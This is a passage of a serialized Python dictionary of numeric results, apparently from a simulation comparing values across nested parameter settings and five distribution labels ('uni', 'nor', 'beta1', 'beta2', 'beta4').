'beta4': 0.23485042539952278}, 10: {'uni': 0.24240830716178507, 'nor': 0.24239798495104373, 'beta1': 0.23901416919802654, 'beta2': 0.252340339870926, 'beta4': 0.23662410365477324}}, 300: {1000: {'uni': 0.243053898871161, 'nor': 0.8232114454294339, 'beta1': 0.24213327571940335, 'beta2': 1.2649793578697028, 'beta4': 0.1434865846334235}, 750: {'uni': 0.24277697138409443, 'nor': 0.671128181328664, 'beta1': 0.2382122025024967, 'beta2': 0.9610201013925472, 'beta4': 0.15099442381409264}, 500: {'uni': 0.2415441903390995, 'nor': 0.5239011024630138, 'beta1': 0.24085249976123604, 'beta2': 0.7160923462546679, 'beta4': 0.16032455575028098}, 400: {'uni': 0.24090473568312606, 'nor': 0.4589917188298054, 'beta1': 0.2401089340456763, 'beta2': 0.6134753236562074, 'beta4': 0.16832475453109194}, 300: {'uni': 0.24176994785336725, 'nor': 0.4131159780152836, 'beta1': 0.23737268022389493, 'beta2': 0.5633941361756649, 'beta4': 0.17658015943691016}, 200: {'uni': 0.23828816545809994, 'nor': 0.3487354251401745, 'beta1': 0.2429355648970097, 'beta2': 0.43986284067280296, 'beta4': 0.190705297281293}, 150: {'uni': 0.24255538533158844, 'nor': 0.32509313749389934, 'beta1': 0.2389950310201909, 'beta2': 0.38991759246533064, 'beta4': 0.19629155163725026}, 100: {'uni': 0.24095331519349314, 'nor': 0.2963437976654876, 'beta1': 0.23965188272123855, 'beta2': 0.33545367591531955, 'beta4': 0.21099104990350545}, 75: {'uni': 0.24221950168410636, 'nor': 0.28546070154906056, 'beta1': 0.2429247640798027, 'beta2': 0.3160255362155384, 'beta4': 0.21049215049193679}, 50: {'uni': 0.24069007546929116, 'nor': 0.26907721641204213, 'beta1': 0.24312415693432637, 'beta2': 0.2909340446638638, 'beta4': 0.22154246200364566}, 30: {'uni': 0.23923154893167575, 'nor': 0.2622736680244658, 'beta1': 0.2400516003722522, 'beta2': 0.2665968226643333, 'beta4': 0.2323366436504289}, 20: {'uni': 0.24138941949164475, 'nor': 0.2551655584694042, 'beta1': 0.24213498137771242, 'beta2': 0.2584842482144281, 'beta4': 0.23566993903051417}, 10: {'uni': 0.2432209669937062, 'nor': 0.25283907350595836, 'beta1': 0.2431742501646928, 'beta2': 0.25078409064276774, 'beta4': 0.23529627943263173}}, 200: {1000: {'uni': 0.24499660366604434, 'nor': 1.097639817869575, 'beta1': 0.23911455181052824, 'beta2': 1.4649285026997207, 'beta4': 0.1359651395598983}, 750: {'uni': 0.24199851808800438, 'nor': 0.887824725825296, 'beta1': 0.2413967087754142, 'beta2': 1.1334345439634328, 'beta4': 0.14047516993915654}, 500: {'uni': 0.24014075287593903, 'nor': 0.6594000341543945, 'beta1': 0.24036435405117293, 'beta2': 0.8216125007394981, 'beta4': 0.14849218268167758}, 400: {'uni': 0.24106960987934098, 'nor': 0.5689946627658751, 'beta1': 0.24110128297972788, 'beta2': 0.771591571279977, 'beta4': 0.1543868467871832}, 300: {'uni': 0.23882273709350196, 'nor': 0.4942731879466135, 'beta1': 0.24011478876050937, 'beta2': 0.6245393310482865, 'beta4': 0.16399101088173093}, 200: {'uni': 0.24033816531081775, 'nor': 0.4032448186638761, 'beta1': 0.2399443452121945, 'beta2': 0.49293684523390047, 'beta4': 0.17527446161393567}, 150: {'uni': 0.2428018327342402, 'nor': 0.3669217193782184, 'beta1': 0.24180877006068127, 'beta2': 0.43756548053840366, 'beta4': 0.18593075843293286}, 100: {'uni': 0.24262619876046118, 'nor': 0.3259239792998355, 'beta1': 0.24152719536498482, 'beta2': 0.3596422376502065, 'beta4': 0.19880936168442362}, 75: {'uni': 0.23859171703363893, 'nor': 0.30398225973573706, 'beta1': 0.24424518838550163, 'beta2': 0.3266938110622517, 'beta4': 0.2056364855121014}, 50: {'uni': 0.24102915503645037, 'nor': 0.2812082623352389, 'beta1': 0.23754445909573635, 'beta2': 0.2988380192608764, 'beta4': 0.21540966947026327}, 30: {'uni': 0.2402253812885772, 'nor': 0.2666026471184283, 'beta1': 0.238929898071989, 'beta2': 0.2770974742803761, 'beta4': 0.22610654163969296}, 20: {'uni': 0.24434570435380387, 'nor': 0.2585112146540725, 'beta1': 0.2415807147279158, 'beta2': 0.2606342573619894, 'beta4': 0.2305235355150038}, 10: {'uni': 0.23918493863914453, 'nor': 0.2509286566547784, 'beta1': 0.23933002800193567, 'beta2': 0.2500227362262458, 'beta4': 0.23670716858488702}}, 150: {1000: {'uni': 0.2480258537942248, 'nor': 1.3567928708960895, 'beta1': 0.24224804232432381, 'beta2': 1.6175890623628855, 'beta4': 0.13045756918703702}, 750: {'uni': 0.24465195063462994, 'nor': 1.1068928812494132, 'beta1': 0.2390436777424845, 'beta2': 1.2607007883259005, 'beta4': 0.1347810736042871}, 500: {'uni': 0.24355017278923838, 'nor': 0.8046287611337243, 'beta1': 0.23962944961533086, 'beta2': 1.0101784924140815, 'beta4': 0.1422529745324236}, 400: {'uni': 0.24311042262969, 'nor': 0.7001338423910112, 'beta1': 0.23781604544465967, 'beta2': 0.8503161974117437, 'beta4': 0.14755128201516188}, 300: {'uni': 0.23886975355360363, 'nor': 0.5799765440309484, 'beta1': 0.2439218469056476, 'beta2': 0.6752562646617146, 'beta4': 0.15560177975408335}, 200: {'uni': 0.23888626458857498, 'nor': 0.4649258351555267, 'beta1': 0.24029027385551024, 'beta2': 0.5570408390062839, 'beta4': 0.16698610009308248}, 150: {'uni': 0.24015716652317576, 'nor': 0.40765528245071664, 'beta1': 0.23978600175962048, 'beta2': 0.45441342190878464, 'beta4': 0.17750135956708718}, 100: {'uni': 0.23976629904286179, 'nor': 0.36342662382072144, 'beta1': 0.2405050450846459, 'beta2': 0.3842744497088235, 'beta4': 0.18785584249443293}, 75: {'uni': 0.2389356283416334, 'nor': 0.32259624193686903, 'beta1': 0.24191287354440572, 'beta2': 0.3467847590799506, 'beta4': 0.1980570402582252}, 50: {'uni': 0.2408638125003841, 'nor': 0.3042380864153837, 'beta1': 0.24040578066044851, 'beta2': 0.3104369462054549, 'beta4': 0.21064017543128524}, 30: {'uni': 0.2394197058224903, 'nor': 0.27555092176119034, 'beta1': 0.24086168161634688, 'beta2': 0.27796026990059064, 'beta4': 0.21692547003483736}, 20: {'uni': 0.24100489267090433, 'nor': 0.26122745551100984, 'beta1': 0.24157057222993414, 'beta2': 0.2668195198530569, 'beta4': 0.2260832537423928}, 10: {'uni': 0.24014954228965793, 'nor': 0.2557788376305037, 'beta1': 0.2403141724564668, 'beta2': 0.2530659083959061, 'beta4': 0.23335177534081086}}, 100: {1000: {'uni': 0.2605919350905233, 'nor': 1.9645624961106296, 'beta1': 0.23984751915564548, 'beta2': 1.8359008724440415, 'beta4': 0.12666464013310433}, 750: {'uni': 0.24878101533631714, 'nor': 1.5348351031851004, 'beta1': 0.24575841302133908, 'beta2': 1.4410150363381768, 'beta4': 0.13064476822715007}, 500: {'uni': 0.24897645116581815, 'nor': 1.0962913335951492, 'beta1': 0.2400935196361046, 'beta2': 1.139636254314367, 'beta4': 0.135551392373918}, 400: {'uni': 0.24719017310896974, 'nor': 0.9450762377875365, 'beta1': 0.2419823823777533, 'beta2': 0.9364751942900571, 'beta4': 0.13774817173610815}, 300: {'uni': 0.24372613070313465, 'nor': 0.7468683361456988, 'beta1': 0.2450582119509388, 'beta2': 0.753557984795017, 'beta4': 0.1447467889754068}, 200: {'uni': 0.2423349982205343, 'nor': 0.5847266279550053, 'beta1': 0.24278399441600393, 'beta2': 0.5942522950060437, 'beta4': 0.15499143884888605}, 150: {'uni': 0.23787954259994942, 'nor': 0.4961451844254886, 'beta1': 0.24362883398497165, 'beta2': 0.5160693053381106, 'beta4': 0.16281905563956578}, 100: {'uni': 0.2431276940551797, 'nor': 0.4086264133449593, 'beta1': 0.23951870411248702, 'beta2': 0.42597352884781375, 'beta4': 0.17677640465192448}, 75: {'uni': 0.23940536757528075, 'nor': 0.3615361183482404, 'beta1': 0.24118088240667318, 'beta2': 0.36478826184276736, 'beta4': 0.1859747021402646}, 50: {'uni': 0.2405321018985597, 'nor': 0.329417829885632, 'beta1': 0.23957898862480795, 'beta2': 0.33255958442071576, 'beta4': 0.19727370515804576}, 30: {'uni': 0.23802803232550665, 'nor': 0.2911149045384273, 'beta1': 0.24333835231642956, 'beta2': 0.2942912241872173, 'beta4': 0.21471628209925814}, 20: {'uni': 0.24141040151777965, 'nor': 0.27732114436367966, 'beta1': 0.24448271505810568, 'beta2': 0.27548856384185805, 'beta4': 0.22047328843008912}, 10: {'uni': 0.2395288532777793, 'nor': 0.25755653747120716, 'beta1': 0.24124009172541977, 'beta2': 0.2548693880806449, 'beta4': 0.2324567144844881}}, 75: {1000: {'uni': 0.2733620041631347, 'nor': 2.5407750263082485, 'beta1': 0.24220653292966504, 'beta2': 1.992313644576726, 'beta4': 0.12253684375736348}, 750: {'uni': 0.2652633553834021, 'nor': 1.921891394256636, 'beta1': 0.23914114635669345, 'beta2': 1.5518115385392717, 'beta4': 0.1256010750231391}, 500: {'uni': 0.2527254324730338, 'nor': 1.378831469746027, 'beta1': 0.24130850311200625, 'beta2': 1.197978006428742, 'beta4': 0.12999795860072655}, 400: {'uni': 0.24984697930169772, 'nor': 1.1613920565872908, 'beta1': 0.24214641743716728, 'beta2': 1.0259603246868627, 'beta4': 0.13486519818983125}, 300: {'uni': 0.2479963230662672, 'nor': 0.9231830439530876, 'beta1': 0.23832883927011117, 'beta2': 0.8854954020037991, 'beta4': 0.13886992475084908}, 200: {'uni': 0.24658425283069435, 'nor': 0.699588699460227, 'beta1': 0.24451554104416093, 'beta2': 0.6628263476389888, 'beta4': 0.14795321820003707}, 150: {'uni': 0.24036354199917276, 'nor': 0.5864620437412704, 'beta1': 0.23953882256474157, 'beta2': 0.54934480302271, 'beta4': 0.15620458279628316}, 100: {'uni': 0.24112317386876864, 'nor': 0.4720377913443705, 'beta1': 0.24454109705882449, 'beta2': 0.4620929610677745, 'beta4': 0.16679016410673922}, 75: {'uni': 0.23732383914340596, 'nor': 0.41438846624049946, 'beta1': 0.2412836743844065, 'beta2': 0.39789224468757356, 'beta4': 0.17713278107583144}, 50: {'uni': 0.24223937685068417, 'nor': 0.35638224091958604, 'beta1': 0.24030382984083512, 'beta2': 0.3468155717538311, 'beta4': 0.18927041379727919}, 30: {'uni': 0.2395894169045569, 'nor': 0.3096973245205462, 'beta1': 0.2402164331553301, 'beta2': 0.29699896987299107, 'beta4': 0.20300323871340764}, 20: {'uni': 0.23995144013357592, 'nor': 0.28693888172104376, 'beta1': 0.23881996736244296, 'beta2': 0.2789792810138777, 'beta4': 0.21398426243766705}, 10: {'uni': 0.24000000221392964, 'nor': 0.2686733818699048, 'beta1': 0.2420959596038857, 'beta2': 0.257136366090763, 'beta4': 0.22733847650105596}}, 50: {1000: {'uni': 0.3068311615645959, 'nor': 3.6736591202407687, 'beta1': 0.24482062417518038, 'beta2': 2.432092145781782, 'beta4': 0.12064828970911215}, 750: {'uni': 0.28912852505671655, 'nor': 2.831736231456402, 'beta1': 0.24339370076078054, 'beta2': 1.9232694348084622, 'beta4': 0.1223013388277045}, 500: {'uni': 0.27181920986827757, 'nor': 1.9692828663527602, 'beta1': 0.24558635427679554, 'beta2': 1.433268319428308, 'beta4': 0.1258545419831927}, 400: {'uni': 0.26686532731179263, 'nor': 1.6136847454717067, 'beta1': 0.24175825591154568, 'beta2': 1.2103855602059785, 'beta4': 0.12813351522250957}, 300: {'uni': 0.26080218844362724, 'nor': 1.2696291936359931, 'beta1': 0.24241872353648633, 'beta2': 0.9918663896414475, 'beta4': 0.1319777391587158}, 200: {'uni': 0.2526083259566342, 'nor': 0.933984988445101, 'beta1': 0.24158668226525173, 'beta2': 0.748342978794983, 'beta4': 0.13912045456877706}, 150: {'uni': 0.24721418406332438, 'nor': 0.752265446490613, 'beta1': 0.23797019102326195, 'beta2': 0.6327723732666909, 'beta4': 0.14465355399933033}, 100: {'uni': 0.23821559230377304, 'nor': 0.5959169440870556, 'beta1': 0.2402644588651114, 'beta2': 0.5151696891568512, 'beta4': 0.15517987578890874}, 75: {'uni': 0.24197758540193703, 'nor': 0.5012351822131893, 'beta1': 0.2385584615799185, 'beta2': 0.4423371131127513, 'beta4': 0.16250378171522337}, 50: {'uni': 0.23793436068418145, 'nor': 0.41216084348155146, 'beta1': 0.2449062869215513, 'beta2': 0.3729679962422796, 'beta4': 0.17552753698854456}, 30: {'uni': 0.2377054028390569, 'nor': 0.3398721831056038, 'beta1': 0.2427909293712705, 'beta2': 0.32306879164070423, 'beta4': 0.19187644285737177}, 20: {'uni': 0.23557847890269124, 'nor': 0.3110020923280968, 'beta1': 0.2395482080645361, 'beta2': 0.289342786687756, 'beta4': 0.20294447085260098}, 10: {'uni': 0.23949403398183788, 'nor': 0.2766693034599573, 'beta1': 0.2416512444769793, 'beta2': 0.2618531639699525, 'beta4': 0.22034386617181895}}, 30: {1000: {'uni': 0.43770022218247145, 'nor': 6.045178745535347, 'beta1': 0.259169089035364, 'beta2': 3.1789688468507187, 'beta4': 0.1189705042688022}, 750: {'uni': 0.3841643631759853, 'nor': 4.6933331437812695, 'beta1': 0.25694284971636117, 'beta2': 2.531928932737123, 'beta4': 0.11959939274766435}, 500: {'uni': 0.33214058043942385, 'nor': 3.122276993402984, 'beta1': 0.24725683979626126, 'beta2': 1.7655550798358093, 'beta4': 0.1212221979595647}, 400: {'uni': 0.3113906173398094, 'nor': 2.5706794658103362, 'beta1': 0.2492477327737819, 'beta2': 1.451535391839624, 'beta4': 0.1234228894172553}, 300: {'uni': 0.2893446935826717, 'nor': 2.0156312350698955, 'beta1': 0.24350296180449926, 'beta2': 1.201763851450293, 'beta4': 0.12591000107060388}, 200: {'uni': 0.273392826252959, 'nor': 1.3867110062484225, 'beta1': 0.24053742109476037, 'beta2': 0.9012159293412797, 'beta4': 0.13008575299715588}, 150: {'uni': 0.2640098391867243, 'nor': 1.1192388423172117, 'beta1': 0.24188846756485693, 'beta2': 0.7467375839736665, 'beta4': 0.13384427582455877}, 100: {'uni': 0.25271345398459155, 'nor': 0.8225120209007627, 'beta1': 0.23935935088809498, 'beta2': 0.5842254905275225, 'beta4': 0.1406395827941181}, 75: {'uni': 0.24788291043542154, 'nor': 0.6818298683800723, 'beta1': 0.24226210440493295, 'beta2': 0.503335957714589, 'beta4': 0.14920430843273713}, 50: {'uni': 0.24243844527057135, 'nor': 0.5339967195283021, 'beta1': 0.2373472370616648, 'beta2': 0.4136763534099132, 'beta4': 0.1594834897970974}, 30: {'uni': 0.23977426044085998, 'nor': 0.40713183447342743, 'beta1': 0.23982470684155024, 'beta2': 0.340373579415394, 'beta4': 0.17496600438379623}, 20: {'uni': 0.23565550978474273, 'nor': 0.35827410322120223, 'beta1': 0.2432582988872901, 'beta2': 0.3028878123522787, 'beta4': 0.18830622296140384}, 10: {'uni': 0.23884244412859004, 'nor': 0.29774554749212095, 'beta1': 0.2429434805995286, 'beta2': 0.27437982722009696, 'beta4': 0.21104469675517187}}, 20: {1000: {'uni': 0.6892754769519168, 'nor': 9.176593622378835, 'beta1': 0.3054951826847113, 'beta2': 4.158533410554479, 'beta4': 0.11844646746439941}, 750: {'uni': 0.5710910368783783, 'nor': 6.85879055020698, 'beta1': 0.291224584817929, 'beta2': 3.3258091577056934, 'beta4': 0.11833379076172601}, 500: {'uni': 0.4490264171861371, 'nor': 4.7388425168137704, 'beta1': 0.2709631964122811, 'beta2': 2.2681127604964746, 'beta4': 0.12091634200893009}, 400: {'uni': 0.40262558544632876, 'nor': 3.7499381178342865, 'beta1': 0.2654247666116526, 'beta2': 1.8935692321733735, 'beta4': 0.12140087563180225}, 300: {'uni': 0.3620101021855284, 'nor': 2.8616884859791774, 'beta1': 0.25914723891983044, 'beta2': 1.486273128641971, 'beta4': 0.12333325025392265}, 200: {'uni': 0.31638143108661526, 'nor': 2.0253546810063368, 'beta1': 0.25051322402716275, 'beta2': 1.0906532820059176, 'beta4': 0.12414596326922459}, 150: {'uni': 0.2932601912449958, 'nor': 1.5701446424813754, 'beta1': 0.2495773997859125, 'beta2': 0.8805733827030208, 'beta4': 0.12850544780237397}, 100: {'uni': 0.2722615156392054, 'nor': 1.134814986920992, 'beta1': 0.243554476948524, 'beta2': 0.6953269837820146, 'beta4': 0.13413712917838938}, 75: {'uni': 0.26123409553509197, 'nor': 0.9185645079205841, 'beta1': 0.24067258854087187, 'beta2': 0.5785524796549206, 'beta4': 0.13768242690559246}, 50: {'uni': 0.2525355140660586, 'nor': 0.6919711376282242, 'beta1': 0.23972453350777076, 'beta2': 0.4621193525410244, 'beta4': 0.14896875998737302}, 30: {'uni': 0.23699092514081888, 'nor': 0.5142059925503737, 'beta1': 0.24033718948188124, 'beta2': 0.3680441197157298, 'beta4': 0.1610601094304951}, 20: {'uni': 0.2368489537086997, 'nor': 0.41959311120894416, 'beta1': 0.2362577222524531, 'beta2': 0.3210354805279546, 'beta4': 0.1755531728961799}, 10: {'uni': 0.2305135874565801, 'nor': 0.33410673964967214, 'beta1': 0.23977045087805413, 'beta2': 0.2750600950398116, 'beta4': 0.19802118365276158}}, 10: {1000: {'uni': 1.9338996668648218, 'nor': 19.136519606563095, 'beta1': 0.7769604206007231, 'beta2': 7.135018695387052, 'beta4': 0.11672148234838667}, 750: {'uni': 1.503083114158401, 'nor': 14.244166458989907, 'beta1': 0.6245406492874473, 'beta2': 5.485855890374126, 'beta4': 0.11590778540337585}, 500: {'uni': 1.0540269543763192, 'nor': 9.636675903157979, 'beta1': 0.4769109867417122, 'beta2': 3.629626196155065, 'beta4': 0.1183646543268232}, 400: {'uni': 0.8778275527846914, 'nor': 7.683428962543298, 'beta1': 0.4235006921305748, 'beta2': 3.1126286625190698, 'beta4': 0.11969294332215273}, 300: {'uni': 0.7118782458518407, 'nor': 5.858208987207176, 'beta1': 0.3702183338793529, 'beta2': 2.2862080783939276, 'beta4': 0.11904220668366429}, 200: {'uni': 0.5317782007011279, 'nor': 3.8818182676243946, 'beta1': 0.3209894941286431, 'beta2': 1.5812012320642916, 'beta4': 0.12034673949960818}, 150: {'uni': 0.45446323423335977, 'nor': 3.0242125711856995, 'beta1': 0.2934232739269098, 'beta2': 1.2805423857971638, 'beta4': 0.12101602618457948}, 100: {'uni': 0.3725508635970142, 'nor': 2.120209894960073, 'beta1': 0.2710235563443484, 'beta2': 0.9070242917255719, 'beta4': 0.12465509096909932}, 75: {'uni': 0.33099815865895554, 'nor': 1.6693650264528523, 'beta1': 0.26131183836252986, 'beta2': 0.756986585821483, 'beta4': 0.12709622599790013}, 50: {'uni': 0.29398694375602924, 'nor': 1.205885184224821, 'beta1': 0.24971858473676287, 'beta2': 0.5807948967581763, 'beta4': 0.13265854229106566}, 30: {'uni': 0.26585428555308954, 'nor': 0.8178737757159222, 'beta1': 0.2418697448772308, 'beta2': 0.43669480643723463, 'beta4': 0.14211953887757617}, 20: {'uni': 0.24373877950691725, 'nor': 0.6138785967144306, 'beta1': 0.23342640175778887, 'beta2': 0.36068002883182226, 'beta4': 0.152895376758761}, 10: {'uni': 0.23264013625029636, 'nor': 0.43398578358983597, 'beta1': 0.22974394844926418, 'beta2': 0.29064283196263124, 'beta4': 0.17437119004836585}}}, 0.25: {1000: {1000: {'uni': 0.21098657037380533, 'nor': 0.35166149873456404, 'beta1': 0.20873759868671643, 'beta2': 0.8400951538540714, 'beta4': 0.1568594703186771}, 750: {'uni': 0.21077721252896842, 'nor': 0.3118537438226372, 'beta1': 0.20810169176177157, 'beta2': 0.6154419955912691, 'beta4': 0.1626506015661881}, 500: {'uni': 0.2121717067619794, 'nor': 0.27590570785230367, 'beta1': 0.2097214424172366, 'beta2': 0.43817472674515884, 'beta4': 0.17369850324548264}, 400: {'uni': 0.20802888613437368, 'nor': 0.26338964054208136, 'beta1': 0.2112189750302959, 'beta2': 0.38728535180277673, 'beta4': 0.17861053808286997}, 300: {'uni': 0.21361140102104362, 'nor': 0.24953596598208133, 'beta1': 0.21110518290253538, 'beta2': 0.3282216898198249, 'beta4': 0.18491825048533722}, 200: {'uni': 0.20729973695492088, 'nor': 0.23646891400599884, 'beta1': 0.20777961312417817, 'beta2': 0.2855197842554735, 'beta4': 0.19176746815365306}, 150: {'uni': 0.2095608253801655, 'nor': 0.2306371196887052, 'beta1': 0.20960687523291455, 'beta2': 0.2636115633933207, 'beta4': 0.19773334554066177}, 100: {'uni': 0.21145691141407225, 'nor': 0.22635031334486544, 'beta1': 0.207683026125086, 'beta2': 0.24292859255051902, 'beta4': 0.20134269310222558}, 75: {'uni': 0.20558051369572755, 'nor': 0.21610770490399964, 'beta1': 0.2074046337720713, 'beta2': 0.23277178385060804, 'beta4': 0.1993614439736463}, 50: {'uni': 0.2098521724204996, 'nor': 0.2147126715773342, 'beta1': 0.21166974003626254, 'beta2': 0.22486117495033467, 'beta4': 0.20265654637570651}, 30: {'uni': 0.21172537882212614, 'nor': 0.21638631455788926, 'beta1': 0.20945408468660293, 'beta2': 0.21870178357399692, 'beta4': 0.20573186312975994}, 20: {'uni': 0.20765899216156328, 'nor': 0.2127196854834208, 'beta1': 0.20989722816174097, 'beta2': 0.21522510154220564, 'beta4': 0.20662730212304828}, 10: {'uni': 0.21324200721363007, 'nor': 0.21458476725098155, 'beta1': 0.21159185053784305, 'beta2': 0.21285942913108694, 'beta4': 0.20769505756945225}}, 750: {1000: {'uni': 0.20869501576743424, 'nor': 0.38956307451420247, 'beta1': 0.20929217837762587, 'beta2': 0.8294859264269948, 'beta4': 0.14827843794917997}, 750: {'uni': 0.21191372347879, 'nor': 0.3476256947224088, 'beta1': 0.2100895194945041, 'beta2': 0.6293056880022027, 'beta4': 0.15614558671553708}, 500: {'uni': 0.20899151314484712, 'nor': 0.3049938966927668, 'beta1': 0.21278455726040738, 'beta2': 0.4517545478635386, 'beta4': 0.16500998800014866}, 400: {'uni': 0.2094061455440297, 'nor': 0.28347980370391473, 'beta1': 0.21066797111669797, 'beta2': 0.3884084809742847, 'beta4': 0.17168736382726482}, 300: {'uni': 0.20916785432371376, 'nor': 0.26801613836270666, 'beta1': 0.20585831925323222, 'beta2': 0.3321029400758897, 'beta4': 0.1786724604421414}, 200: {'uni': 0.2085643081118847, 'nor': 0.2475562529946184, 'beta1': 0.20903879620035365, 'beta2': 0.2939306029876208, 'beta4': 0.18588153828339068}, 150: {'uni': 0.20735477521949924, 'nor': 0.23724909106407047, 'beta1': 0.20908779012385287, 'beta2': 0.273775240862008, 'beta4': 0.19142047852315378}, 100: {'uni': 0.20869783166523406, 'nor': 0.22732909767667214, 'beta1': 0.20933417310193372, 'beta2': 0.24880217826881731, 'beta4': 0.19816157590407354}, 75: {'uni': 0.21039255871863496, 'nor': 0.22185240574552587, 'beta1': 0.20887880701399933, 'beta2': 0.2399960689165522, 'beta4': 0.20281785091945453}, 50: {'uni': 0.21029781920645818, 'nor': 0.21912777348936618, 'beta1': 0.21068267834413842, 'beta2': 0.23167246136886402, 'beta4': 0.20249769600112058}, 30: {'uni': 0.20952942367398258, 'nor': 0.21384193819534977, 'beta1': 0.21131912031339217, 'beta2': 0.21737064331552444, 'beta4': 0.20575552847814524}, 20: {'uni': 0.20890110085437386, 'nor': 0.2131594319904166, 'beta1': 0.2069034393988381, 'beta2': 0.21768352193128865, 'beta4': 0.2067555030577237}, 10: {'uni': 0.21254200132120335, 'nor': 0.21459786026621233, 'beta1': 0.20943234976185285, 'beta2': 0.21262251673957, 'beta4': 0.20999488209611167}}, 500: {1000: {'uni': 0.2059302858390542, 'nor': 0.49650776830039456, 'beta1': 0.21228903191473655, 'beta2': 0.9152969330737528, 'beta4': 0.1385187931902294}, 750: {'uni': 0.20920355176220426, 'nor': 0.41783563551683944, 'beta1': 0.20926141856456745, 'beta2': 0.7052019038441916, 'beta4': 0.14434793862546202}, 500: {'uni': 0.2151437182196634, 'nor': 0.3435520404521243, 'beta1': 0.20734688138213653, 'beta2': 0.5003830980619229, 'beta4': 0.15713333007243896}, 400: {'uni': 0.21063437135255508, 'nor': 0.31892308057831464, 'beta1': 0.21113940284117513, 'beta2': 0.4412496584112251, 'beta4': 0.16017169484934324}, 300: {'uni': 0.20774895174208088, 'nor': 0.2943930693913531, 'beta1': 0.20808087256826407, 'beta2': 0.37221993303002127, 'beta4': 0.16991539749581303}, 200: {'uni': 0.2114411912598273, 'nor': 0.2623047450364031, 'beta1': 0.20904736920658953, 'beta2': 0.31767722063774184, 'beta4': 0.17919824602785273}, 150: {'uni': 0.20986749913233252, 'nor': 0.24854552809441302, 'beta1': 0.2084663319906776, 'beta2': 0.2975844690768615, 'beta4': 0.18526543867232495}, 100: {'uni': 0.2092594424706574, 'nor': 0.23279372973204007, 'beta1': 0.21211034584787994, 'beta2': 0.2644889198824187, 'beta4': 0.19024613519545072}, 75: {'uni': 0.20844772203737807, 'nor': 0.2290003034992577, 'beta1': 0.20939561863598244, 'beta2': 0.25004310791145395, 'beta4': 0.19675116512816965}, 50: {'uni': 0.2092848896434689, 'nor': 0.22360302358346792, 'beta1': 0.21089442292304225, 'beta2': 0.23526180636184657, 'beta4': 0.1999628539597155}, 30: {'uni': 0.21018248597640826, 'nor': 0.2221002716523805, 'beta1': 0.20856908930100013, 'beta2': 0.22178971202454867, 'beta4': 0.20140677748683855}, 20: {'uni': 0.21139847384081079, 'nor': 0.21492418220939347, 'beta1': 0.21044560730256473, 'beta2': 0.21755423547583938, 'beta4': 0.2057056915636604}, 10: {'uni': 0.21253820678170735, 'nor': 0.2131854331538128, 'beta1': 0.21275732435191913, 'beta2': 0.21643787131857808, 'beta4': 0.20769941181178414}}, 400: {1000: {'uni': 0.20950261162873524, 'nor': 0.5592207143886676, 'beta1': 0.20822088577391698, 'beta2': 0.9405640273128262, 'beta4': 0.13503805725703802}, 750: {'uni': 0.20840138500109906, 'nor': 0.4650706220967377, 'beta1': 0.20526961258426463, 'beta2': 0.7104148724896289, 'beta4': 0.13947694930523324}, 500: {'uni': 0.20944699177544024, 'nor': 0.3750531448374544, 'beta1': 0.2084873935072584, 'beta2': 0.5124805978381733, 'beta4': 0.150674746212122}, 400: {'uni': 0.21053083340394316, 'nor': 0.34703743831574946, 'beta1': 0.20776791692219637, 'beta2': 0.44807947444895996, 'beta4': 0.15642781061103203}, 300: {'uni': 0.2074453749043504, 'nor': 0.31374511391981097, 'beta1': 0.21042211951567266, 'beta2': 0.38435133093857443, 'beta4': 0.16508578865255383}, 200: {'uni': 0.2104725786341283, 'nor': 0.2799770460973791, 'beta1': 0.20755994599842575, 'beta2': 0.34310666630971454, 'beta4': 0.17526551053955433}, 150: {'uni': 0.2096991276282607, 'nor': 0.25909354880735697, 'beta1': 0.21020106280412626, 'beta2': 0.3026139672022534, 'beta4': 0.18019983975383427}, 100: {'uni': 0.21072783143131407, 'nor': 0.2441372701363183, 'beta1': 0.2103056697850539, 'beta2': 0.26482028071061453, 'beta4': 0.18743887187889346}, 75: {'uni': 0.21105992437147847, 'nor': 0.23961175954975408, 'beta1': 0.20974892521253838, 'beta2': 0.25146456182551963, 'beta4': 0.1945200088246506}, 50: {'uni': 0.21121839060128927, 'nor': 0.22491565366984967, 'beta1': 0.20657380975370745, 'beta2': 0.23555742098780033, 'beta4': 0.19921377300790927}, 30: {'uni': 0.210239619388815, 'nor': 0.22117997080110338, 'beta1': 0.2090488783845568, 'beta2': 0.22806384829930174, 'beta4': 0.2023335447482615}, 20: {'uni': 0.20710380380206825, 'nor': 0.21627486248329422, 'beta1': 0.20980239596055913, 'beta2': 0.22058570136671965, 'beta4': 0.20218103858951156}, 10: {'uni': 0.21015959409654134, 'nor': 0.21454425127510138, 'beta1': 0.2118316634707065, 'beta2': 0.21620662628256074, 'beta4': 0.20829747772817003}}, 300: {1000: {'uni': 0.21024825533358832, 'nor': 0.6739178980512721, 'beta1': 0.2085070129937928, 'beta2': 1.0261291442854992, 'beta4': 0.12715583194445038}, 750: {'uni': 0.2118817480727133, 'nor': 0.5637239937328892, 'beta1': 0.21166510216163434, 'beta2': 0.7773995918748892, 'beta4': 0.1324222831320455}, 500: {'uni': 0.2098650271914982, 'nor': 0.4371006134554429, 'beta1': 0.20733569395123477, 'beta2': 0.5680527516013063, 'beta4': 0.14332521349654906}, 400: {'uni': 0.2083566386881128, 'nor': 0.3942554582663016, 'beta1': 0.2109565236914346, 'beta2': 0.49603828475465767, 'beta4': 0.15004299961046552}, 300: {'uni': 0.2100854250121582, 'nor': 0.35012881881465224, 'beta1': 0.20823701579975476, 'beta2': 0.44755108426014584, 'beta4': 0.15584642690437633}, 200: {'uni': 0.2097480900554049, 'nor': 0.29687244055718565, 'beta1': 0.21075844321998985, 'beta2': 0.3656759955352811, 'beta4': 0.16579343571612243}, 150: {'uni': 0.20568174343660908, 'nor': 0.27935310252324946, 'beta1': 0.20756684708571857, 'beta2': 0.3228522288000466, 'beta4': 0.17502874843773394}, 100: {'uni': 0.20807636324904133, 'nor': 0.257139917737112, 'beta1': 0.21060259493504813, 'beta2': 0.28415204574523667, 'beta4': 0.18088846276906836}, 75: {'uni': 0.20708717304715557, 'nor': 0.245123598107367, 'beta1': 0.21219451365636394, 'beta2': 0.26166242982354787, 'beta4': 0.18805634454725603}, 50: {'uni': 0.21114468570411718, 'nor': 0.23207945600734575, 'beta1': 0.20959999471878374, 'beta2': 0.24206775007689266, 'beta4': 0.19335277680526938}, 30: {'uni': 0.20889523163632018, 'nor': 0.22229036893037993, 'beta1': 0.2106596749268794, 'beta2': 0.22937469799168445, 'beta4': 0.1989194572736962}, 20: {'uni': 0.2102417437445108, 'nor': 0.22075709709390393, 'beta1': 0.20895525479901536, 'beta2': 0.22010616263145255, 'beta4': 0.20157150517012473}, 10: {'uni': 0.20971114225447923, 'nor': 0.21561068929125432, 'beta1': 